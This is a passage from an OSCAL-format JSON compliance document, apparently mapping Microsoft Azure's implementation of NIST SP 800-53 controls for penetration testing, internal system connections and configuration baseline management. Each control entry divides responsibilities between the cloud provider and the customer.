in these cases). As part of the rules of engagement, the Third Party Assessment Organization (3PAO) conducts a vulnerability analysis of the information system and penetration testing based on those results, as identified in the Security Assessment Report (SAR). The analysis steps are as follows: * The 3PAO reviews the Azure system security plan to determine whether the required elements identified in NIST SP 800-18 Revision 1 are properly documented. * The 3PAO reviews the Azure system security plan and related component documentation to determine whether the security controls meet the minimum security level recommendations provided in NIST SP 800-53 Revision 4. * The 3PAO reaches a consensus on the level and detail of testing for the system, using assessment test cases and conducting an analysis to determine risk factors and impact. * The security assessment tests are designed to evaluate the efficacy of the security controls in place, as documented in the system security plan, to ensure that the required levels of confidentiality, integrity, and availability are in fact supported by the existing or proposed security measures. * The 3PAO develops and approves the Security Assessment Plan and employs technical and non-technical measures including, but not limited to, on-site interviews, observations, system testing, and evaluation. * The results of the assessment activities performed by the 3PAO include a formal report, with work papers that support the conclusions of the security assessment report. * Microsoft provides an exit brief of results prior to report finalization.
"}],"responsibilities":[{"uuid":"cbfe1538-5012-47c5-b47f-c9a381e0567a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-035"}],"description":"The customer is responsible for conducting penetration testing for customer-deployed resources.","provided-uuid":"49f839e4-e89e-4769-a07d-dee3a343edad"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"988f6ce9-146f-4f85-806a-c1d884b2a199","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-8.1","statements":[{"uuid":"df0bde98-1f32-4d55-887f-6a9cef436938","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-036"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-8.1_smt","by-components":[{"uuid":"f788c6fe-09fa-4d5f-b3a0-b80ca9c78121","export":{"provided":[{"uuid":"281d0b57-b425-4d28-ba80-3a3dc70d10f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-036"}],"description":"The Third Party Assessment Organization (3PAO) performs penetration testing on the information system at least annually. 
The Penetration Test Report covers Azure system components identified as part of the authorization boundary."}],"responsibilities":[{"uuid":"ea08c4ca-ab99-457d-9fb2-ed868a9799e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-036"}],"description":"The customer is responsible for employing an independent agent or team to perform penetration testing on customer-deployed resources (note that this may be the 3PAO used for recurring assessments, or it may be a different independent assessor).","provided-uuid":"281d0b57-b425-4d28-ba80-3a3dc70d10f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c66e2154-de96-4803-809f-8b4b02d710b7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-8.2","statements":[{"uuid":"762d6e7c-0423-48cc-8abc-522cfe3a8b90","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-8.2_smt","by-components":[{"uuid":"e31015b7-42e4-407b-9701-a32c9e49f786","export":{"provided":[{"uuid":"657662df-5345-4911-a777-2253e1f89c4e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-037"}],"description":"Microsoft employs Red Team penetration test activities regularly. This testing is executed with approved penetration testing tools of the kind utilized by adversaries, to ensure Azure is sufficiently tested against real-world attacks. 
Including capabilities such as Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinates overt and covert activities to validate and strengthen the global Azure and sovereign infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall compliance certifications."}],"responsibilities":[{"uuid":"778e8d21-72c7-494b-bd37-4e684ca224ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-037"}],"description":"The customer is responsible for employing organization-defined red team exercises to simulate attempts by adversaries to compromise organizational information systems in accordance with organization-defined rules of engagement.","provided-uuid":"657662df-5345-4911-a777-2253e1f89c4e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4a8a75eb-64c0-477e-a45f-d81f2e8bd6b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-9","statements":[{"uuid":"fbe8ddde-5476-4740-9ad7-822f6399e361","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.a","by-components":[{"uuid":"e85f6e9a-199b-49f8-bb47-2b1922dcef62","export":{"provided":[{"uuid":"e33ddf7a-a6d2-49b5-8b04-ab483745a9cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-038"}],"description":"As part of standard 
configuration management processes, Microsoft authorizes individual assets connected to the environment. Teams generate threat models and/or data flow diagrams which include details of components within and connected to the information system. Microsoft does not connect any constituent components to the Azure environment other than assets provisioned within the environment boundary. Such assets are subsequently considered part of the Azure information system once connected. Azure assets are configured according to Azure baselines."}],"responsibilities":[{"uuid":"ec744e5b-e8e2-41cb-9589-e0aa512f39cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for authorizing internal connections across customer-deployed resources (e.g., system connections to VMs).","provided-uuid":"e33ddf7a-a6d2-49b5-8b04-ab483745a9cf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d4eae7a9-f49d-411b-b47e-8553f97fdd5a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.b","by-components":[{"uuid":"3ca85678-65df-46f2-adca-3a3c905c3c72","export":{"provided":[{"uuid":"cc13d2d5-bdaf-448d-9aa3-e5aec84bdf8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-039"}],"description":"As part of standard configuration management processes, Microsoft documents interface characteristics and security requirements for individual assets connected to the environment. 
These documents go through privacy, compliance, and security reviews. To request a change to the host-based firewall, the service team must populate a questionnaire, providing descriptions of the request, requirements, and justification for the change. Depending on the asset classification of data, descriptions may include data types, current compliance with data handling, and any risk assessment or threat analysis the Azure team has conducted in coordination with Privacy, Corporate, External, and Legal Affairs (CELA), or C+AI Security. The Azure team must also provide documentation to help C+AI Security Solutions assess operational risks (e.g. architecture and network diagrams, infrastructure threat models, etc.)."}],"responsibilities":[{"uuid":"f6c36790-6f13-4025-9780-34f11b0a9744","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for documenting the details of each internal connection between the classes/resources defined in CA-09.a.","provided-uuid":"cc13d2d5-bdaf-448d-9aa3-e5aec84bdf8e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6caec9aa-1896-445b-b260-855d0dc1c7dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.c","by-components":[{"uuid":"d7aedb9e-dfe4-4843-8bc8-8548d4d7600d","export":{"provided":[{"uuid":"b1468465-91bd-4430-9ab1-978c8d229e79","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-040"}],"description":"Microsoft does 
not connect any constituent components to the Azure environment other than assets provisioned within the environment boundary. Such assets are subsequently considered part of the Azure information system once connected. Assets are validated as part of the configuration management process, which includes security compliance checks to ensure the components are validated as approved assets for Azure. Once reviewed, Azure assets or connections that are no longer deemed necessary are removed through the Microsoft change management process."}],"responsibilities":[{"uuid":"8d695b9b-56a7-41ea-98eb-de67e90bb020","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-040"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for terminating internal system connections after a specified condition.","provided-uuid":"b1468465-91bd-4430-9ab1-978c8d229e79"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e71b0ee6-dcf9-4b7f-817d-284f586c4f9f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.d","by-components":[{"uuid":"259a7f74-d50e-4b91-a7cc-026f53aaf16f","export":{"provided":[{"uuid":"cb8fccba-f2ed-457d-befa-6dd73ca7c3ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-041"}],"description":"The Microsoft Change Management Standard specifies that all substantial changes must be reassessed and require review by the change review committee. 
Where appropriate, a Post-Implementation Review (PIR) may confirm that the change has met its objectives and that there have been no unexpected side-effects."}],"responsibilities":[{"uuid":"89aff978-a439-4495-850e-14ae3fc831e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-041"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing the continued need for each internal connection.","provided-uuid":"cb8fccba-f2ed-457d-befa-6dd73ca7c3ba"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ca4063b0-221d-4e8d-bcec-f81c2665f432","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2","statements":[{"uuid":"92cc7e2b-88e5-4d57-9f4d-01968079d3b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-2_smt.a","by-components":[{"uuid":"53e72e22-b489-427e-87eb-e51bc79a3c4d","export":{"provided":[{"uuid":"bf46c719-5abf-468e-be9e-6e5c94b166a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-006"}],"description":"Azure establishes and maintains configuration baselines using multiple sources, including: * Existing, updated, and new industry and regulator requirements * New software releases and configuration updates * Customer demand signals * External research findings and internal findings from incident management, penetration testing, security reviews, and other 
teams who are constantly learning about the operating environment * Compliance team requirements Azure reviews and updates required configuration baselines at least annually. In all cases, changes to the configuration baselines are developed, tested, and approved prior to entering the production environment from a development or test environment. Configuration baselines are maintained under configuration control using Liquid, the Microsoft document repository. Functionally, configuration baselines are reviewed and updated more often as a result of regular updates, reviews, and investigations. Logical images of the baselines are maintained in Azure DevOps. Azure applies configuration baselines differently for hardware and software: for hardware, using the bootstrap configuration process; for software, using the change and release process. Depending on the type of asset, there are different configuration baselines and processes. Servers Server configuration baselines are released and implemented internally via Azure Security Pack (AzSecPack). These configuration baselines are monitored by Azure Security Monitoring (ASM) and SCUBA using the baseline scanning component of AzSecPack. Supported versions of AzSecPack monitor both Windows and Linux operating systems. Additional supported operating systems versions and distributions are evaluated by the ASM team as part of semester planning twice a year and are then added based on business priority and resources. Azure Host, Azure Native, and Azure Guest Servers The RDOS team updates the server configuration baseline for Azure Host, Azure Native, and Azure Guest assets. The server base image is a version in which the kernel and many other core components have been modified to optimize them for the Azure environment. For service teams using Cloud Services, Windows server images are in the form of Virtual Hard Disks (VHDs) that are deployed as Guest VMs in the production environment. 
For Linux images, service teams use the Secure Base Image (SBI) that has been customized for secure configuration baselines relevant to Azure. Bare Metal and Pilotfish Servers The services running on Bare Metal and Pilotfish servers, including, but not limited to, Jumpboxes, Active Directory, Azure DNS, and other service teams, run standard Windows Server. The configuration baseline image for these assets is provided by the IPAK Engineering Team. IPAK incorporates the security configuration baselines established by the Azure Security Monitoring (ASM) team into the server images and makes those images available for consumption and deployment by engineering teams. Updated IPAK images are released monthly. IPAK documentation is made available to Microsoft personnel on the IPAK internal website, including release notes, install locations, and general IPAK information. Development changes to the IPAK are recorded, tested, and approved prior to implementation, as defined by the standardized change management process. The server is then configured per the role deployment specification by each service team, including the required validation steps prior to the server being released to production. The IPAK engineering team also manages deprecation of old baselines, notifying service team personnel at least twelve (12) months prior to end of life. Changes to the IPAK configurations are made only by appropriate personnel. Network Devices For network devices, the Azure Networking team sets the configuration baseline using recommended configurations specific to each hardware vendor, and makes updates periodically based upon recommendations from the vendor and internal analysis and investigation. For each type of network device, Azure Networking maintains configuration baseline documentation on the Azure Networking Standards and Architecture SharePoint site or in Azure DevOps. The networking configuration baselines are stored in Network Graph Database (NGS). 
Deployment methods, including reimaging, automated configuration update, scripted configuration change, and manual Method of Procedure (MOP) steps, call data from NGS. NGS provides a code-defined, source-controlled schema with the content to define the configuration baseline for each network device, meaning that the configuration on the device is generated from source regardless of the deployment method used. The network device configuration baseline itself is therefore stateless but the configuration generated from NGS data is, at any point in time, the Gold Configuration of that device. Only the Azure Networking team can make changes to configuration baselines for network devices in Azure. When Azure Networking deploys network devices, the team runs the Config Policy Verifier (CPV) tool before the device goes live on the Azure production environment. CPV verifies the configuration of the device against the Gold Configuration of the appropriate device type. In addition, CPV runs ongoing daily monitoring of all network devices for conformance to the Gold Configuration. Azure Services Azure service teams maintain software assets running on the baselines described above. Each software asset has an established configuration baseline documented in code in a configuration file associated with the asset that is maintained under change control as part of the Change and Release Management processes. Service teams develop, document, and maintain the baselines for each asset in the approved software baseline repository, Azure DevOps. This ensures the baselines remain under configuration control. Changes to the code configuration baselines go through the Security Development Lifecycle (SDL) process, which requires approval from multiple individuals through Ownership Enforcer (OE) or branch policies prior to production deployment. 
The configuration baseline for ports and protocols allowed for Azure services are monitored by the C+AI Security team via Network Isolation (NetIso). C+AI Security monitors network configurations of Windows and Linux services for internet-exposed management endpoints and high-risk ports and protocols as defined per the C+AI Platform security baseline process."}],"responsibilities":[{"uuid":"92b25653-8e81-4d86-a701-99898425da14","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and maintaining a baseline configuration of customer-deployed resources. If the customer uses a non-Microsoft provided OS on Guest VMs, it is their responsibility to maintain and manage the baseline configuration on that OS. Additionally, it is the customer's responsibility to maintain any application baselines they may have running in Azure.","provided-uuid":"bf46c719-5abf-468e-be9e-6e5c94b166a7"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3204082a-0065-48f0-ae90-18d4fe50696d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-008"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-009"}],"statement-id":"cm-2_smt.b","by-components":[{"uuid":"9c670e81-64c7-4269-ae9c-45d611c7e320","export":{"provided":[{"uuid":"a0428194-2880-4a81-92a3-331c9ae2069d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-007"}],"description":"Each configuration baseline team works with the respective imaging team for updates at least annually or when required due to a significant change and as part of new software or component-specific release and upgrade. Changes from United States Cyber Command tactical orders or directives can be accommodated. However, analysis is required to determine if a directive is applicable to the Azure services. There is a reasonable probability that a directive is not applicable. Microsoft internal components are specifically engineered for its operations and do not rely on third-party applications. They are further isolated from direct external connections. They must be further tested to ensure that there is no detrimental impact to the configuration baselines and that the associated vulnerability is not already accommodated by compensating or mitigating controls. All changes must go through the approved deployment process. 
Additionally, the configuration baselines may be reviewed and updated based on significant change to the Azure environment which may include, but is not limited to the following: * Adding new core missions or business functions * Acquiring specific and credible threat information that the organization is being targeted by a threat source * Establishing new or modified laws, directives, policies, or regulations Servers The Logging and Monitoring team thoroughly reviews and updates the Azure configuration baselines based on new security configurations or changes to existing security configurations of the OS and components at least annually or when a significant change occurs. Additionally, if business priorities require an update to the operating system image as part of the twice per year semester planning, the baselines team works with the respective imaging team - Azure RDOS team for Azure Host, Native, and Guest images, and IPAK for Bare Metal and Pilotfish - for updates as appropriate. Any updates to images are scheduled as part of the Change and Release Management process. Network Devices For network devices, the Azure Networking team sets the configuration baselines for network devices using recommended configurations specific to each vendor, and these teams make updates at least annually based upon recommendations from the vendors as well as internal testing, requirements, and feedback. Azure Services Azure utilizes a continuous integration and continuous deployment (CI/CD) model for services, ensuring the software baselines are updated regularly - in some cases, multiple times per day. Azure service teams maintain software baselines for each asset in the approved software baseline repository, Azure DevOps. This ensures the baselines remain under configuration control. 
Changes to configuration baselines go through the Security Development Lifecycle (SDL) process, which requires security signoffs prior to production deployment, among other security."},{"uuid":"ef8f2993-a8d3-4ded-8739-e623eb1f7f1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-008"}],"description":"Each configuration baseline team works with the respective imaging team for updates at least annually or when required due to a significant change. Changes from United States Cyber Command tactical orders or directives can be accommodated. However, analysis is required to determine if a directive is applicable to the Azure services. There is a reasonable probability that a directive is not applicable. Microsoft internal components are specifically engineered for its operations and do not rely on third-party applications. They are further isolated from direct external connections. They must be further tested to ensure that there is no detrimental impact to the configuration baselines and that the associated vulnerability is not already accommodated by compensating or mitigating controls. All changes must go through the approved deployment process. 
Additionally, the configuration baselines may be reviewed and updated based on significant change to the Azure environment which may include, but is not limited to the following: * Adding new core missions or business functions * Acquiring specific and credible threat information that the organization is being targeted by a threat source * Establishing new or modified laws, directives, policies, or regulations"},{"uuid":"307b5230-6e9b-4cd5-ad76-03ba7e99b93b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-009"}],"description":"Each configuration baseline team works with the respective imaging team for updates as appropriate to applicable configuration baselines as part of the new software or component-specific release and upgrade."}],"responsibilities":[{"uuid":"ba32e1a7-27e8-4a9b-8a94-dbfd45be04c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the baseline configuration of customer-deployed resources.","provided-uuid":"a0428194-2880-4a81-92a3-331c9ae2069d"},{"uuid":"ae6f30b9-3ffb-47ee-834d-df21594e5dbd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the baseline configuration of customer-deployed resources when required by organization-defined circumstances.","provided-uuid":"ef8f2993-a8d3-4ded-8739-e623eb1f7f1c"},{"uuid":"717e87c3-6e6d-46e4-b1d9-22e97ab7194e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the baseline configuration of customer-deployed resources when installations and upgrades 
occur.","provided-uuid":"307b5230-6e9b-4cd5-ad76-03ba7e99b93b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b370d00e-cb83-4777-b29c-f8e960e39cc1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2.2","statements":[{"uuid":"dd92ae0a-ab48-4f91-a43e-5998747b1755","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-2.2_smt","by-components":[{"uuid":"debbd79f-7feb-4162-833d-de9b02738c03","export":{"provided":[{"uuid":"623f9297-d2d3-4dba-98dd-b7b266448e45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-010"}],"description":"Servers Configuration baseline information is stored in Azure DevOps, an automated tool that allows Azure to maintain an up-to-date, complete, accurate, and readily available configuration baseline of Azure assets. Network Devices All configuration baselines are stored as abstracted metadata in the network graph database (NGS). NGS is itself managed in a compliant and source-controlled instance of Azure DevOps. 
Azure Services Configuration baseline information as code is stored in Azure DevOps, an automated tool that allows Azure to maintain an up-to-date, complete, accurate, and readily available configuration baseline of Azure services."}],"responsibilities":[{"uuid":"bffb2903-014b-471c-a144-4de2b385c28d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-010"}],"description":"The customer is responsible for employing automated mechanisms to maintain an up-to-date, complete, accurate, and readily available baseline configuration of customer-deployed resources.","provided-uuid":"623f9297-d2d3-4dba-98dd-b7b266448e45"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63abaee3-775c-4485-9917-9bbdef4863a6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2.3","statements":[{"uuid":"2f290db9-6794-4744-92a7-ff9cb6772839","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-2.3_smt","by-components":[{"uuid":"c5f1a3a3-c0e2-462c-9382-f9f5e29bd3c2","export":{"provided":[{"uuid":"ae12d141-76cb-4f16-a9de-150dbee12277","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-011"}],"description":"Azure implements procedures for at least the most recent previous version of the configuration baseline and configuration settings within at least one internal baseline storage solution, in the event information systems need to 
roll back to a stable version. Servers Configuration baselines and configuration settings are available via the Azure DevOps repository history in case a rollback to a previous baseline version is required. Additionally, a copy of the official configuration baseline is published internally to the Liquid requirements catalog that is the authoritative source of requirements authored and maintained by CELA policy owners as well as other groups across the company. Network Devices Previous versions of the configuration baselines for network devices are maintained permanently and archived in Network Device Manager (NDM) for at least three (3) months. Network Device Manager is Microsoft-built software for storing configuration templates. In addition, networking configuration baselines are stored in Network Graph Database (NGS) and Azure DevOps indefinitely. Azure Services Service code is stored in Azure DevOps, which retains older versions of code indefinitely."}],"responsibilities":[{"uuid":"a6b61dcd-cbeb-4aaf-8728-b1ff019c67a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-011"}],"description":"The customer is responsible for retaining previous versions of baseline configurations for customer-deployed resources.","provided-uuid":"ae12d141-76cb-4f16-a9de-150dbee12277"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1286cbcb-85d7-4a4d-8eb4-d5e99858d138","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2.7","statements":[{"uuid":"90fd792a-a74d-4b79-9daa-cca8f75db41f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-012"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cm-2.7_smt.a","by-components":[{"uuid":"19378139-8bf8-4bf6-b101-dfb60b03e928","export":{"provided":[{"uuid":"7db8aaf2-3942-4be7-aaf6-50ce62231138","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-012"}],"description":"Azure customer content is never stored outside of Azure, which is physically located within the continental United States. 
Azure personnel do not travel with devices contained within the Azure inventory."}],"responsibilities":[{"uuid":"6a4ac3b0-471f-424a-82a5-be8a89c861da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-012"}],"description":"The customer is responsible for mobile devices within their environment.","provided-uuid":"7db8aaf2-3942-4be7-aaf6-50ce62231138"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fd57d821-81f4-417d-b7da-11ba6d612eaf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-013"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cm-2.7_smt.b","by-components":[{"uuid":"e2ed4627-cef2-43b7-987f-7405c98b84b6","export":{"provided":[{"uuid":"6e59c574-7193-4752-a3af-b4c5aa836ff1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-013"}],"description":"Azure customer content is never stored outside of Azure, and Azure personnel do not travel with devices contained within the Azure inventory."}],"responsibilities":[{"uuid":"41ed8528-4a62-4282-a9ce-d724a5f749f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-013"}],"description":"The customer is responsible for mobile devices within their environment.","provided-uuid":"6e59c574-7193-4752-a3af-b4c5aa836ff1"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0479395c-15ea-428b-b80f-9456fcac27c1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3","statements":[{"uuid":"f15e891f-a747-44dd-a97f-8e41acec4d2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.a","by-components":[{"uuid":"1c739ae1-9dee-4b3b-ab37-2bb3e5fb8bc6","export":{"provided":[{"uuid":"5b7618d0-ec7c-4a4d-849a-e5218d7c9ea4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-014"}],"description":"Configuration baselines are established based on industry standards, including CIS Benchmarks, DISA STIGs, NSA, various vulnerability library knowledgebases that are 